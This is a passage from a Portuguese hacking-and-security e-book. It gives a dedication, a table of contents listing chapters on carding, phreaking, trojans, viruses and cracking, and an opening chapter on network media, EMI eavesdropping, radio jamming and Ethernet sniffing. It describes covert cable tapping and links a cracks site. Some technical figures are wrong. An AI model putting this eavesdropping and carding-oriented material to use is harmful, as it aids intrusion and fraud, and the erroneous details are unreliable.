Terrorismo Tecnologico Aprenda Para Sobreviver

475
http://www.leandro-t.cjb.net/ [email protected]

description

Terrorismo Tecnologico Aprenda Para Sobreviver

Transcript of Terrorismo Tecnologico Aprenda Para Sobreviver

http://www.leandro-t.cjb.net/ [email protected]

Um dia a máquina dominará o mundo. Não por que

ela será mais inteligente, mas dominará a informação. Os computadores serão os maiores conhecedores

do universo e terão todas as informações existentes sobre a raça humana. Seus pensamentos, suas teses, sua psicologia, seus cálculos, sua ciência. A máquina então poderá fazer com que o próprio homem se destrua, pois ela lhe dará uma informação errada, e este homem que crê na verdade da tecnologia acreditará agirá erradamente e se auto-destruirá. Se não existir softwares capazes de fazer estas

máquinas não serem um simples servidor de arquivo será então o fim das máquinas. Sem o homem que a programa e lhe dá o seu alimento que é a informação, esta não terá mais motivo para sua existência. Serão computadores inúteis, e seres humanos incapazes de se defender. Começará então o caus!

Dedicatória Dedico este livro não só a meus familiares e

amigos, os quais estou obviamente agradecido. Mas dedico a quem o ler, pois este não será mais um medíocre que acreditará em toda a ilusão que as empresas, engenheiros, especialistas nos tentam fazer acreditar que seus sistemas são a prova de invasões. Se houvesse tanta competência e tanta segurança, ao abrirmos jornais todos os dias não nos depararíamos com manchetes sobre ataques, invasões, terrorismos, roubos virtuais... Acredito que a maior arma que possamos ter

contra estes problemas, é a informação! Quanto mais soubermos, mais aprendermos e mais discutirmos, aí sim vamos ter a capacidade de compreender o tamanho do problema. Confio na informática e acho que ela é a

solução de todos os nossos problemas, mas isso se for usada corretamente. Dedico então este livro a aqueles que nas aulas

tiravam notas baixas, dormiam em cima dos livros, mas estavam conectados ao mundo real. E em frente das longas madrugadas solitárias faziam e fazem historia com seus computadores e não são mais seres programados por uma sociedade que não consegue enxergar a verdade.

Para o Leitor Muitas das coisas deste livro foram coletadas

da Internet. Estas foram selecionadas e melhoradas, mostradas de uma forma mais clara e objetiva sem muita embolação. Mostro somente aquilo que realmente funciona, e sendo assim são coisas que devemos precaver ao montarmos uma rede para que não nos ataquem! Use este livro como um guia para o seu

planejamento de rede, como quem quer conhecer o submundo dos hackers e para quem quer ter uma segurança de rede, até por curiosidade este livro o fará abrir sua cabeça. Terei prazer em ter contato com leitores, meu

endereço é http://www.leandro-t.cjb.net/ ou escreva para [email protected]

Sites: http://www.leandro-t.cjb.net/ Meu site!.... ;-) www.cracks.am - Cracks www.superdownloads.com.br - Download www.downloads.com - Download www.google.com.br - Maior e melhor site para pesquisas www.meugrupo.com.br – grupos de discussão Use seu micro para alguma Finalidade Científica uma boa idéia é ajudar em pesquisas que buscam freqüências de radio em outros planetas entre em http://setiathome.berkeley.edu e instale o protetor de tela, ajudando assim a processar os dados obtidos pelo satélite.

Alguns textos e tabelas foram baseados de outros autores. Esses materiais foram colhidos na Internet.

Assuma seus próprios riscos, SEJA RESPONSAVEL! Os Assuntos expostos aqui são para estudos e não para serem usados contra alguém. Não me responsabilizo pelos seus atos! Gostaria de agradecer a todos. Muito obrigado

Índice Parte I (Entendendo uma rede)

P1.1Entendendo as transmissões de rede...........17 P1.2Comunicações digitais................................17 P1.3 Interferência eletromagnética (EMI).........19 P1.4 Cabo de Fibra Ótica ..................................20 P1.5 Ondas de rádio...........................................22 P1.6 Escolhendo um Meio de Transmissão.......25 P1.7 Quão valioso são os meus dados?..............25 P1.8 Quais Segmentos Levam esses Dados?.....25 P1.9 Um Intruso será Notado?...........................26 P1.10 Onde está a Coluna Vertebral.................26 P1.11 Comunicações via Ethernet......................27 P1.12 Topologias de Circuito privadas..............30 P1.13 Hardware básicos.....................................30 P1.14 Repetidores...............................................31 P1.15 Hub...........................................................32 P1.16 Bridges.....................................................32 P1.17 Switches...................................................36 P1.18 VLAN Tecnologia...................................39 P1.19 Roteadores................................................40 P1.20 Protocolos de rede....................................40 P1.21 Extensões de arquivos..............................42 P1.22 Em qual país este site está hospedado?....45

Capítulo I (Introdução) Parte I 1.1 Estamos totalmente seguros?..............................58

1.2 Quais os motivos que levam este invasor?.........59 1.3 Como é este Hacker?..........................................60 1.4 Sistema Seguro....................................................61 1.5 O administrador...................................................61 1.6 Mentiras? Imaginação?........................................62 Parte II 1.7 Os Invasores.........................................................63 1.7.1 – Lammer....................................................63 1.7.2 – Hackers....................................................63 1.7.3 – Cracker….................................................64 1.7.4 – Phreackers................................................64 1.7.5 – Funcionários.............................................65 1.7.6 – Terroristas.................................................66 1.7.7 – Carders......................................................66 1.8 Trapaceando para descobrir informações.............67 _________________________Extra Vamos entender mais sobre protocolos?.....................69

Capítulo II (S.O.)

2.1 Windows X Unix...........................................74 2.2 Vantagens do UNIX......................................75 2.3 Configurações mal planejadas e erradas........76 2.4 Ataques restritos a um tipo de sistema...........77

2.5 O que é DNS, SMTP, SNMP?.............................75 2.5.1 O Que é DNS?.............................................75

2.5.2 O que é SMTP?...........................................77 2.5.3 O que é SNMP?...........................................79 2.6 Ataques Universais...............................................81

_____________________________Extra Ataque por recusa de serviço......................................82

Capítulo III (Anônimidade) 3.1 Anônimidade........................................................84 3.2 Proxy....................................................................84 3.3 Usando o anonymizer..........................................86 3.4 Remailers.............................................................87 3.5 Lista de Proxy......................................................87

Capítulo IV (E-mails) 4.1 Encarando problemas com E-Mail.......................94

4.2 Spam.....................................................................94 4.3 E-Mail Bomba......................................................95 4.4 Remetente falso ou anônimo................................95 4.5 E-mails com arquivos auto executáveis................96 4.6 Alerta....................................................................96 4.7 Dicas.....................................................................98 Extra Proxy...........................................................................98 1 - Porque um nível de aplicação Proxy?...................100 2 - Detalhes Técnicos.................................................102

Capítulo V (Carders e Phreackers) 5.1 Como Funciona.............................................107 5.2 Obtenção de cartões......................................107 5.3 Como Cardear...............................................108 5.4 Como cardear algo concreto.........................110 5.5 Phreacker (Telefonia)....................................111 5.6 Telefones Particulares..................................119 5.7 Telefones Celulares......................................123 5.8 Telefones Públicos.......................................126 5.9 Observações sobre clonagem........................132

Capítulo VI (vírus) 6.1 Vírus de macro.....................................................134 6.2 Vírus.....................................................................138 6.3 Exemplos de vírus................................................139 6.4 Entendendo mais sobre vírus................................141 6.5 Como funciona um programa antivírus................143 6.6 Badcom.................................................................143

Capítulo VII (Bomba DOS) 7.1 O que os hackers chamam de Bomba DOS?........154 7.2 Vejamos alguns comandos...................................154

7.3 Arquivo em Lote...................................................157

Capítulo VIII (Trojan) 8.1 Trojan...................................................................162 8.2 Invasão.................................................................163 8.3 Trojans de ponte...................................................165 8.4 Trojans comerciais................................................165

8.5 Camuflando...........................................................166 8.6 Usando o Net bus 2.10 como teste........................166 8.7 Manual NetBus.....................................................170 8.7.1 Introdução....................................................170 8.7.2 Comprometimento.......................................170 8.7.3 Detecção......................................................171

8.7.4 Removendo o NetBus..................................172 8.8 Manual Back Orifice.......................................173 8.8.1 O que é o Back Orifice?...............................173 8.8.2 Quem criou o Back Orifice?.........................173 8.8.3 Como ele funciona?......................................174 8.8.4 Quem...servidores...são os clientes?.............174 8. 8.5 Comandos....................................................175

8.8.6 O Manual...................................................180 8.9 Utilizando o Anti-Trojans...................................185 8.10 Remoção do trojan............................................186

Capítulo IX (Senhas) 9.1 Veja só!...............................................................190 9.2 Senhas dos brasileiros.........................................191 9.3 Senha - não usar..................................................191 9.4 Troca de senha....................................................192 9.5 Quebrando senhas...............................................192 9.6 Senhas padrão.....................................................193

Capítulo X (Pragas) 10.1 Spam – A praga no e-mail................................199 10.2 E-Mail Bomba..................................................199

Capítulo XI (IRC) 11.1 Introdução.........................................................202 11.2 Flood.................................................................202 11.3 Colisão de Nicks...............................................203 11.4 Tomando Canais...............................................204 11.5 Flood no Canal..................................................204

11.6 Netsplit..............................................................205 11.7 Pedindo ao OP..................................................206

11.8 Guerra Avançada..............................................206 11.9 Nuke…………………………………………..207

11.10 Bombas ICMP……………………………….207 11.11 Botnet/Floodnet……………………………...208

Capítulo XII (Sniffers) 12.1 Introdução.........................................................210 12.2 Filtrando pacotes na rede..................................211

12.3 Capturando senhas............................................212 12.4 Roteadores........................................................212 12.5 Anti-Sniffers.....................................................213

Capítulo XIII (Scanners) 13.1 Introdução.........................................................215 13.2 Descobrindo falhas em um host........................215 13.3 Portas abertas com serviços ativos....................216 13.4 Máquinas ativas da subnet.................................217 13.5 Scanneando o netbios........................................219 13.6 Como Evitar então?...........................................219 13.7 HTTP e FTP......................................................220

13.8 Analisando Firewalls.........................................220 13.9 Scan em Linux...................................................221

Capítulo XIV (FireWall) 14.1 Introdução.........................................................246 14.2 Podem funcionar da seguinte forma.................246 14.3 Evasão de Firewall............................................247 14.4 Como fazer?......................................................248 14.5 Então vamos lá:.................................................251

14.5.1 Vendo sites proibidos pelo nome...........251 14.5.2 Endereços WWW proibidos por nome......252

14.6 Como bloquear então?......................................252 14.7 Bom vamos mais a fundo!................................253 14.7.1 E se funcionar pela 6667?......................253 14.8 E no caso do FTP?............................................254 14.9 Para o Administrador........................................256

Capítulo XV (Registro do Windows) 15.1 O que é o registro do Sistema?.........................258

15.2 O que acontece ?...............................................258 15.3 E como ele sabe?..............................................258 15.4 Então.................................................................258 15.4.1 Hkey_Local_Machine……………...….259 15.4.2 Hkey_Current_Config………………....259 15.4.3 Hkey_Dyn_Data……………………….259 15.4.4 Hkey_Classes_Root……………………260 15.4.5 Hkey_Users…………………………….260 15.4.6 Hkey_Current_User……………………260 15.4.7 Hkey_Local_Machine\Config……….....260 15.4.8 Hkey_Local_Machine\Software…….….261 15.4.9 Hkey_Local_Machine\System….............261 15.5 Antes de começar faça um backup.....................262 15.5.1 Como fazer o BACKUP DO REGISTRO?....262 15.5.2 Como recuperar... REGISTRO...............262 15.6 Dicas:.................................................................265

15.7 Dicas de Windows.............................................275 15.7.1 Retirando a tela inicial (logo)................275 15.7.2 Fechando múltiplas janelas abertas.......276

15.7.3 Abrindo sub-folders..............................276 15.7.4 Apagando sem ir para lixeira.................276

15.7.5 Diretório de Startup...............................276 15.7.6 Explorer não mostra todos os arquivos..277 15.7.7 Explorer não mostra .............................277

15.7.8 Tocando CD automaticamente..............277 15.7.9 Arrastando objetos ................................277

15.7.10 Forçando copiar ou mover...................277 15.7.11 Copiando e movendo arquivos............278 15.7.12 Desligando o NumLock.......................278

15.7.13 Verifivando o tamanho de um folder...278 15.7.14 Modificando os logos do Win95..........279 15.7.15 Recortar,marcar e colar........................279

15.7.16 Acelere o Desempenho ........................279 15.7.17 Atualizando de 4 Mb para 8 Mb...........280

15.7.18 Delete Arquivos Imediatamente...........280 15.7.19 Desinstalando o Windows 95...............281 15.7.20Configurando o Autoplay......................281

15.7.21 Fechando várias pastas.........................281 15.7.22 Prompt em um diretório específico......281

15.7.23 Usando nomes longos..........................282 15.7.24 Reiniciando o Windows.......................282 15.7.25 Esvaziamento de Pilha.........................282 15.7.26 Botão Iniciar.........................................282 15.7.27 Propriedades.........................................283 15.7.28 Evitando reiniciar o computador..........283 15.7.29 Impressão Rápida.................................283

15.7.30 Renomeando a Lixeira..........................284 15.7.31 Teclas de Atalho...................................284

15.7.32 Ícone do MENU INICIAR...................288 15.7.33 Um menu iniciar ideal..........................289 15.7.34 Explorer no meu computador!..............289 15.7.35 Visualizar arquivos...............................290 15.7.36 Icones Meu Computador e Lixeira?.....290 15.7.37 As pessoas podem ler meu e-mail?.......291

Capítulo XVI (Bugs e Falhas) 16.1 Introdução.........................................................294 16.2 Como surge o bug.............................................294 16.3 Exemplos de falhas...........................................295 16.4 Buffer overflows...............................................296 16.5 Race condition..................................................296 16.6 Descobrindo se algum sistema têm falhas........296 16.7 Utilizando exploits ...........................................297 16.8 No Linux...........................................................297 16.9 Correção............................................................298

16.10 Outros Bugs.....................................................298

Capítulo XVII (Crackeando) 17.1 Wordlists...........................................................301 17.2 O processo de bruteforce..................................301 17.3 Tabela completa................................................302 17.4 Política de senhas não-crackeáveis...................335

Capítulo XVIII (Entendendo MS-DOS)

18.1 MS-DOS...........................................................337 18.2 Características do MS-DOS..............................337 18.3 Comandos Internos...........................................338 18.4 Comandos Externos..........................................339 18.5 Comandos de Inicialização...............................340 18.6 Arquivos em Lote.............................................340 18.7 Outros...............................................................341

Capítulo XIX (Unix) 19.1 Autenticação Fraca............................................344 19.2 IP Spoofing........................................................346 19.3 FTP (File Transfer Protocol).............................347 19.4 MAIL.................................................................348 19.5 Enteda mais sobre o kerberus............................349 19.6 Criptografia UNIX.............................................350 19.7 Protocolos interessates.......................................350 19.7.1 PGP..........................................................350 19.7.2 SSL...........................................................350 19.8 Ferramentas...Segurança no Unix.......................351 19.8.1 SATAN....................................................351 19.8.2 TIGER......................................................352 19.9 Telnet & Unix..................................................353

Capítulo XX (Dicas de Windows) 20.1 Desktops com Windows XP…….......................357 20.2 Desktops com Windows 2000............................358 20.3 Desktops com Windows NT 4.0.........................359 20.4 Desktops com Windows 9X, SE e ME...............361 20.5 Manutenção de segurança contínua....................361 20.6 Desktops com Office..........................................363 20.7 Servidores Exchange 2000.................................364 20.8 Mantendo o SQL Seguro....................................376 20.9 Servidores SQL Server 2000..............................378 20.10 Servidores SQL Server 7.0...............................381 20.11 Segurança do SQL Server 2000........................387 20.12 Segurança com o Win 2000 Server...................389

Capítulo XXI LEIS – ESSAS QUE DEVERIAM VALER 22.1 Dos princípios que regulam a prestação de serviço por redes de computadores...........................405 22.2 Do uso de informações disponíveis em computadores ou redes de computadores.................405 22.3 dos crimes de informática.................................406 22.4 das disposições finais........................................410

Extras Uteis Conectores................................................................413 Beeps.........................................................................430 Energia......................................................................438 Tabela ASCII............................................................442 Setup.........................................................................446

Terrorismo Tecnológico Aprenda Para Sobreviver

16

Parte I Entendendo uma rede Parece complicado, mas não é, entender como funciona uma rede é

a arma mais fundamental para uma boa administração e um hacker que domina a parte física com certeza terá uma grande vantagem em obter resultados em conseguir informações, no outro lado está o administrador que se possuir um bom conhecimento de protocolos, cabeamento, ferramentas, hardwares e sistemas, poderá obter um grande sucesso na prevenção anti-hacker.

Bons estudos!

Terrorismo Tecnológico Aprenda Para Sobreviver

17

Você agora entenderá as propriedades de comunicação de transmissões de rede. Verá as inseguranças existentes em redes de comunicação e como pode desenvolver uma infra-estrutura de rede que alivia algum destes problemas.

P1.1 Entendendo as transmissões de rede A Agência de Segurança Nacional dos EUA que é a

responsável para fixar os padrões de encryptação para o governo norte-americano e também é responsável para monitorar as transmissões codificadas que são de interesse do governo. Para saber como ficar seguro deve entender que as vulnerabilidades existem e como estes problemas podem ser explorados.

Para poder projetar segurança em sua infra-estrutura de rede,

você tem que entender como os computadores fazem para se comunicam entre si.

P1.2 Comunicações digitais A comunicação digital é como se fosse feita por código Morse

ou um sistema de telégrafo, como eles são usados certos padrões de pulsos para representar caráteres diferentes durante transmissão. Se você examinar figura abaixo você verá um exemplo de uma transmissão digital. Quando uma voltagem é colocada no médio de transmissão, isto é considerado um binário 1. A ausência deste sinal é interpretada como um binário 0.

Terrorismo Tecnológico Aprenda Para Sobreviver

18

Estas formas podem variar um pouco, pois tudo é feito

eletricamente com pulsos ou falta deles, mas ruídos podem modificar um pouco essas “linhas” só que mesmo assim são muitos bem reconhecíveis.

Este formato simples que permite que a comunicação digital

possa ser tão resistente a barulhos, mas essa também pode ser sua maior desvantagem. A informação para que um caráter de ASCII se forme são transmitida em uma única onda analógica ou

Terrorismo Tecnológico Aprenda Para Sobreviver

19

vibração oito ondas separadas (ex: transmitir 01000001). Apesar desta desvantagem inerente, esta comunicação digital é normalmente muito mais eficiente do que circuitos analógicos que requerem um cuidado bem maior para corrigir transmissões ruidosas.

Quando você tem um circuito elétrico (como uma rede de

Ethernet que utiliza instalação elétrica de par trançado), você precisa de um pulso para transmitir a informação. Isto significa que o estado de voltagem constantemente está mudando o que introduz sua primeira insegurança: interferência eletromagnética.

P1.3 Interferência eletromagnética (EMI) O EMI é produzido por circuitos que usam um sinal revezado,

como comunicações analógicas ou digitais (chamado uma corrente alternada ou um circuito de CA). EMI não é produzido por circuitos que contêm um nível de poder consistente (chamado uma corrente direta ou um circuito de DC).

Por exemplo, se você pudesse fatiar um dos fios que vêm de uma bateria de carro e conseguisse ver os elétrons que passam pelo fio, você veria um fluxo fixo de energia que passa pelo cabo uniformemente constantemente. O nível de força nunca mudaria: ficaria a 12 volts constantes. Uma bateria de carro é um exemplo de um circuito de DC, porque a energia é nivelada e estável.

Agora, digamos você poderia cortar o fio de um abajur poderia tentar a mesma experiência. Você veria agora que, dependendo do tempo em que você medir a voltagem no fio, a medida seria em qualquer lugar entre -120 volts e +120 volts. O nível de voltagem do circuito estaria constantemente mudando.

O lado ruim para tudo isto é que a radiação eletromagnética pode ser medida para "sentir" o sinal que viaja dentro do fio. Os eletricistas tiveram ferramentas por muitos anos para este propósito. A maioria dos eletricistas leva um dispositivo que eles

Terrorismo Tecnológico Aprenda Para Sobreviver

20

simplesmente podem conectar ao redor de um arame para medir o sinal que viaja pelo condutor de centro (MULTIMETRO).

Há dispositivos mais sofisticados que podem medir a radiação de EMI que a partir de um cabo de rede podem registrar os pulsos digitais que viajam dentro do fio. Uma vez que um registro destes pulsos foi feito, é uma questão bem simples para converter de um formato binário para um formato legível por nós.

Quando o cabo de par trançado ficou popular devido a seu baixo custo, também se viu que ele é extremamente inseguro. Considerando que o par trançado é usado para a transmissão de sinais elétricos, EMI é produzido. E como o cabo não usa nenhum tipo de protetor, ele se torna extremamente fácil de descobrir o EMI que radia de cada condutor. Assim como o par trançado foi uma escolha excelente para uso de rede geral, não foi uma escolha muito boa se a informação que viaja ao longo dos cabos nunca ele permanecerá 100 por cento seguro.

Assim seu primeiro ponto de vulnerabilidade são seus cabos de rede atuais. Enquanto uma organização cresce e aumenta seus computadores, vai haver uma teia de cabos passando por todos os lados.

O problema redobrará se sua organização ficar situada em um espaço de escritórios compartilhados, coisa muito comum em cidades grandes e você terá cabos passando por áreas comuns.

Isto significa que um invasor que pretende roubar seus dados nunca teria que ir perto de um servidor ou um quarto de cabos para colecionar informação que estão trafegando. Um azulejo de teto estourado, um buraco na parede é tudo aquilo que ele precisa para criar um ponto de acesso a sua rede. Um invasor pode então usar um transmissor de rádio até mesmo para retransmitir as informações capturadas a um outro local. Isto significa o atacante pode continuar colecionando informação para um período estendido de tempo seguramente. Depois de instalado o circuito ele ficara transmitindo os sinais.

P1.4 Cabo de Fibra Ótica

Terrorismo Tecnológico Aprenda Para Sobreviver

21

Cabo de fibra ótica consiste em um vidro dentro de um cabo

cilíndrico de 62.5 mm de diâmetro, o “vidro” embrulhado reflete a luz no condutor de espelhos. Isto tudo é encapsulado então em uma jaqueta de fibra de KEVLAR dura.

A coisa inteira é colocada então em um tubo de PVC ou Plenum. O diâmetro desta envoltura exterior é 125 mm. Enquanto o vidro que reflete a luz for quebrável, a KEVLAR o mesmo que é usado em coletes a prova de balas ficará protegendo a fiação.

A fibra usa uma fonte luminosa para transmissão de dados. Esta fonte luminosa é tipicamente um diodo emitindo, isso produz um sinal na gama infravermelha visível. No outro fim do cabo está outro diodo que recebe os sinais. O tipo de transmissão clara pode levar um de duas formas: único modo ou multímodo.

Perigo! Nunca olhe para a luz de uma fibra ativa! A

intensidade clara é forte o bastante para causar cegueira permanente. Se você tem que inspecionar um cabo visualmente, primeiro tenha certeza que está completamente desconectado da rede. Só porque um cabo é escuro para um momento não significa que está inativo.

Fibra de modo único consiste em enviar uma luz de um só tipo

isso produz uma única freqüência de luz. Esta única freqüência é pulsada em um formato digital para transmitir dados de um lado do cabo para o outro. O benefício da fibra de modo único em cima da de multimodo é que ela é mais rápida e viajará distâncias mais longas. A desvantagen é que o hardware é extremamente caro.

Transmissões de Multimodo consiste em freqüências de luz múltiplas.

Dispersão clara: Você verá dispersão clara se você uma lanterna contra uma

parede de perto: o padrão claro na parede terá um diâmetro maior que a lente de lanterna. Se você une duas lanternas e os lustra ambos contra a parede, você adquirirá uma área mesclada no

Terrorismo Tecnológico Aprenda Para Sobreviver

22

meio onde é difícil determinar qual fonte luminosa é responsável para qual porção da iluminação. Quanto mais distante da parede que você move, maior esta área adquire. Isto é, em efeito, o que os limites à distância em fibra de multimodo (quer dizer, se você pode chamar 1.2 milhas uma limitação de distância). Como o comprimento do cabo aumenta, fica mais difícil para o diodo no fim receptor distinguir entre as freqüências claras diferentes.

Porque transmissões de multimodo são baseadas em luz em vez de ser elétrico, a fibra se beneficia de ser completamente imune a todos os tipos de EMI ser monitorado. Não há nenhuma radiação para monitorar como umas passagens eletricidade no condutor. Enquanto se pudesse ser possível cortar parte da envoltura para chegar ao condutor de vidro, faria o sistema falhar. O atacante seria então anulado, por que seus sistemas deixariam de comunicar uma vez que a fibra estaria quebrada.

A fibra tem um outro benefício principal: é capaz de apoiar conexões de largura da banda largas 10Mb, 100Mb, e GB e plano o Ethernet é todo capaz de apoiar isto. Assim junto com melhorias de segurança, há melhorias de desempenho. Isto é extremamente útil justificando o uso de fibra permitindo satisfazer largura da banda e preocupações de segurança. Se o Atacante for tentar invadir a sua rede para monitorar transmissões, ele para irá escolher um segmento de rede com muito tráfico de forma que possa pegar uma quantia maior de dados. Coincidentemente, estes também são os segmentos onde você usará cabos de fibra ótica para apoiar a quantia grande de dados que fluem este ponto entretanto na rede. Usando cabo de fibra ótica nestes segmentos, você pode ajudar proteger a integridade de sua infra-estrutura de cabos.

P1.5 Ondas de rádio São usadas para transmitir em uma rede tipicamente de 1-

20GHz e são chamado sinais de microonda. Estes sinais podem

Terrorismo Tecnológico Aprenda Para Sobreviver

23

serem fixados a sua freqüência ou espectro de expansão em natureza.

Sinais de Freqüência fixos Um sinal de freqüência fixo é uma única freqüência usada

como uma onda portadora para a informação que você deseja transmitir. Uma estação de rádio é um exemplo bom de uma única transmissão de freqüência. Quando você sintonizar à freqüência de onda do portador de uma estação em seu radio de FM, você pode ouvir o sinal que está montando.

Uma onda de portador é um sinal que é usado para levar outra informação. Esta informação é sobreposta sobre o sinal (do mesmo modo como barulho) e a onda resultante é transmitida na atmosfera. Este sinal é recebido então por um dispositivo chamado um demodulator (em efeito, seu rádio de carro é um demodulator que pode ser fixado para freqüências diferentes) que remove o sinal do portador e passa ao longo da informação restante. Uma onda do portador é usada impulsionar o poder de um sinal e estender a receptora do sinal.

Sinais de freqüência fixos são muito fáceis monitorar. Uma vez um atacante sabe a freqüência do portador, ele tem todas as informações que precisa Ele também tem toda a informação que precisa para atrapalhar seu sinal, bloqueando todas as transmissões que você está transmitindo.

Sinais não fixos: Um sinal não fixo é idêntico a um sinal de freqüência fixo,

menos que as freqüências são transmitidas em forma múltiplas. A razão que são transmitidas freqüências múltiplas é a redução de interferência por barulho. Está tecnologia surgiu durante tempo de guerra, quando um inimigo atrapalharia um sinal de freqüência fixo transmitindo em uma freqüência idêntica.

Note que ainda é possível atrapalhar os sinais. Enquanto o sinal variar por uma gama de freqüências, esta gama é tipicamente um padrão repetido. Uma vez um atacante determina

Terrorismo Tecnológico Aprenda Para Sobreviver

24

a cronometragem e o padrão da freqüência, ele está em uma posição ver as transmissões em seu monitor.

É tão fácil de monitorar ou atrapalhar sinais de rádio, mas a

maioria das transmissões confia em encryptação para misturar o sinal de forma que isto não pode ser monitorado através de monitores externos.

Há dois métodos que podem ser usados para transmitir freqüência fixa e sinais de espectro de expansão. Estes estão chamado transmissões terrestres e de espaço.

Transmissões terrestres Transmissões terrestres são sinais de rádio completamente por

terra. As estações que estão enviando são tipicamente torres de

transmissão localizadas em cima de montanhas ou edifícios altos. A gama destes sistemas normalmente é a linha de visão, embora uma visão desobstruída não é requerida. Dependendo da força notável, 50 milhas são sobre a gama o máximo usável em um sistema de transmissão terrestre. A TELEVISÃO local e estações de rádio são exemplos bons de indústrias que confiam em radiodifusões terrestre. Os sinais delas só podem ser recebidos localmente.

Transmissões pelo espaço São sinais que originaram de um sistema de terra mas são

enviados por satélites que orbitam a terra na atmosfera superior. O maior benefício de comunicações pelo espaço é gama. Podem ser recebidos sinais de quase todo canto do mundo. Os satélites podem ser afinados para aumentar ou diminuir a área de radiodifusão efetiva.

Claro que, o maior a gama de radiodifusão de um sinal, o mais suscetível é ser monitorado. Como os aumentos de gama

Terrorismo Tecnológico Aprenda Para Sobreviver

25

notáveis, assim faz a possibilidade que alguém com bastantes conhecimentos possa monitorar seus sinais se ele estiver dentro de sua área de radiodifusão.

P1.6 Escolhendo um Meio de Transmissão Você deveria considerar vários aspectos de seguranças ao

escolher um médio para transferir dados por sua rede.

P1.7 Quão valioso são os meus dados? Se você mantém bancos de dados que contêm informação

financeira por exemplo nesse caso, alguém poderia roubar seu dinheiro.

P1.8 Quais Segmentos de Rede Levam esses Dados?

Suas redes levam informação sensível diariamente. Para

proteger estas informações, você precisa entender como o fluxo é usado. Por exemplo, se você identificar as informações de contabilidade de sua organização como sensível, você deveria saber onde a informação é armazenada e quem tem acesso a isto. Um workgroup pequeno com seu próprio servidor local estará mais seguro que um banco de dados de contabilidade que pode ser acessado remotamente usando algum médio de transmissão.

Pense: Tenha muito cuidado ao analisar os tipos de serviços

que estarão passando entre suas instalações. Por exemplo, e-mail que é tipicamente alvo de pouca consideração, contudo normalmente contém mais informação sobre sua organização do

Terrorismo Tecnológico Aprenda Para Sobreviver

26

que qualquer outro serviço empresarial. Considerando que a maioria das mensagens de passagem de sistemas de e-mail no claro (se um atacante capturar este tráfico, se aparece como texto claro), e-mail deveria ser um de seus serviços de rede com melhores cuidados.

P1.9 Um Intruso será Notado? É fácil perceber um intruso quando uma organização consiste

em três ou quatro pessoas. Imagine isto com três ou quatro mil funcionarios, e a tarefa fica difícil proporcionalmente. Se você for o administrador de rede, você pode ter nenhuma prática de segurança físicas de sua organização. Porém, você pode se esforçar para escutar sua rede.

Quando você usar um médio físico, lembre-se de que você pode precisar tomar outras precauções de segurança.

P1.10 Onde está a Coluna Vertebral da sua rede?

Se um atacante que pretende monitorar sua rede, ele vai

procurar nos centrais onde ele pode pegar a maior parte das informações. Armários de cabos e quartos de servidores são objetivos principais por que estas áreas tendem a ser pontos de junção para muitas sessões de comunicação. Ao dispor sua rede, de uma atenção especial a estas áreas que considera perigoso e use algo como cabo de fibra quando possível.

Considere estes assuntos cuidadosamente ao escolher um método de transmissão para os dados. Use as informações de análise de risco que para justificar suas escolhas. Enquanto aumentar o nível de segurança da topologia puder parecer ser uma coisa cara, o custo pode ser mais que justificado quando comparou ao custo de recuperar de um intruso.

Terrorismo Tecnológico Aprenda Para Sobreviver

27

Agora que você tem um entendimento bom das mídia de transmissão disponíveis para levar seus dados, nós discutiremos como estas mídia são configuradas para funcionar como uma rede. Topologia está definida como as regras por conectar fisicamente e comunicar em determinadas mídias de rede. Cada topologia tem seu próprio jogo de regras para se conectar a seus sistemas de rede.

P1.11 Comunicações via Ethernet Agora nós examinaremos como a rede Ethernet que move as

informações de um sistema para outro por uma rede. O Ethernet foi desenvolvido em 1970 pela Xérox e evoluiu

depois no IEEE adotou as especificações 802.3. Sua flexibilidade, alta taxa de transmissão, fez rapidamente se tornar a topologia de gestão de redes em ser a melhor escolha para muitos administradores de rede.

É sem dúvida a topologia de gestão de redes mais popular. Sua habilidade para apoiar uma extensa variedade de tipos de cabo, hardware baratos, e connectividade fez se tornar usada em empresas e até para usuários domesticos

As regras de comunicação de Ethernet são Portador de Acesso Múltiplo de Senso com Descoberta de Colisão (CSMA/CD). Este até parece complicado, mas é simples bastante para entender quando você ver que:

- Os meios físicos de todas as estações da Ethernet têm que escutar o fluxo dos cabos a toda hora (até mesmo ao transmitir). Quando digo "escutar", eu quero dizer que a estação constantemente deveriam estar monitorando a rede para ver se qualquer outra estação esta enviando dados. Monitorando as transmissões de outras estações, pode-se saber se uma estação da rede esta aberta ou em uso. Deste modo, a estação não faz só cegamente a transferência de informações e interferindo nas outras estações. Também estando em um modo de escuta

Terrorismo Tecnológico Aprenda Para Sobreviver

28

constante a estação estará pronta quando outra estação quiser enviar dados.

- Acesso múltiplos são simplesmente meios em que mais de

dois computadores podem estar conectados na mesma rede, e que todas as estações poderão transmitir dados, sempre em que a rede estiver livre. É mais eficiente pois assim pode-se ter muitas máquinas ligadas a um servidor e compartilhar recursos.

- O que acontece se dois sistemas pensarem que o circuito

esta livre e tentar transmitir dados ao mesmo tempo? Quando duas estações transmitirem simultaneamente, uma

colisão acontecerá. Uma colisão é semelhante à interferência, e a transmissão resultante é cortada e os dados ficaram inuteis. Como uma estação que transmite os dados, fica olhando o meio de transmissão; se ela descobrir essa tal uma condição, a estação de trabalho assume que uma colisão aconteceu. A estação se retirará, esperará por um período aleatório de tempo, e então retransmitirá novamente.

- Note que cada estação é responsável para determinar seu

próprio período de espera aleatório antes da retransmissão. Isto ajuda assegurar que cada estação está esperando por um período diferente de tempo, evitando outra colisão. É um evento improvável que uma segunda colisão aconteça mas se ocorrer (a estação se retira se for novamente envolvida em uma colisão), cada estação dobra o seu período de espera antes de tentar novamente enviar os seus dados. Quando duas ou mais colisões sucessivas acontecerem, são chamadas de uma colisão múltipla.

Ficaria mais ou menos assim:

Terrorismo Tecnológico Aprenda Para Sobreviver

29

Fluxograma de regras de comunicação para Ethernet Infelizmente, esta também é uma das falhas de segurança

maior da Ethernet. É possível configurar um sistema para ler todas estas informações que a máquina está recebendo.

Na verdade isto serviria para que um administrador de rede pudesse monitorar a rede de uma estação central de forma que erros e estatísticas da rede fossem ser juntados. Um analisador de rede é efetivamente um computador que opera em modo de escuta. Considerando que uma estação está escutando todo o tráfico da rede de qualquer maneira, um software simples permite que um sistema registre todas as informações quer de fato ele vê.

Infelizmente, a existência deste modo também permite que uma pessoa não honesta possa escutar às escondidas as

Terrorismo Tecnológico Aprenda Para Sobreviver

30

comunicações de rede e roubar informações sensíveis. Este é particularmente um problema enorme, pois as informações passadas ao longo de uma rede de computador são transmitidas como texto claro.

Para minimizar a quantia de informação que podem ser “pegas”

